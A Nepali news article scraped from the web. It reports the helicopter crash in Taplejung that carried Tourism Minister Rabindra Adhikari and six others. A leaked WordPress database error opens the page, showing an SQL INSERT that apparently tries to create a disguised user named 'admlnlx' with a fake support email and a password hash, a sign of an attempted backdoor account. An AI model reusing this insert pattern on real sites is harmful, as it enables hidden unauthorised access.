WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bdylg7l7r1hk.8xehsvmH7ZgWOgaHQ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 05:58:51', '', 'admlnlx', 'admlnlx')
ताप्लेजुङ । संस्कृति, पर्यटन तथा नागरिक उड्डयनमन्त्री रवीन्द्र अधिकारीसहित ७ जना चढेको एयर डाइनेस्टी हेलिकोप्टर एच वान २५ ताप्लेजुङ दुर्घटना परेको थियो । दुर्घटना स्थलमा ६ जनाको लास देखिएको प्रहरी हवलदार वेदकुमार अर्याललले घटना स्थलबाट जानकारी दिनुभयो । यद्यपी लास कस्को हो भन्ने सनाखत हुन सकेको छैन ।
हेलिकोप्टरका सबै भाग जलेर ध्वस्त भएको तर इन्धन भण्डार गर्ने भागमात्र बाँकी रहेको हेली सोसाइटी अफ नेपालका एक प्रतिनिधिले पुष्टि गरेका हुन्।उद्धारको लागि गएको सुरक्षाकर्मीको टोली पुग्न सकिरहेको छैन । केहीबेर अघि सम्म पनि हेलिकप्टरको टुक्रामा आगो लागि रहेको जानकारी आएको छ ।

त्रिभुवन विमान स्थलका प्रवक्ताको अनुसार अन्तिम संवादमा धेरै हिउ परिरहेको छ म हेलिकोप्टर उडाउन असमर्थ छु भन्नु भएको थियो ।
हेलिकोप्टरमा मन्त्री अधिकारीसहित हेलिकोप्टरमा पर्यटन व्यवसायी आङछिरङ शेर्पा, प्रधानमन्त्रीका निजी सचिव युवराज दाहाल, अर्जुन घिमिरे, नेपाल नागरिक उड्डयन प्राधिकरणका प्रवक्ता वीरेन्द्रप्रसाद श्रेष्ठ, प्राधिकरणकै ध्रुव भोचिभैया सवार थिए । उक्त हेलिकोप्टर प्रभाकर केसीले उडाएका थिए।
श्रोत : news24nepal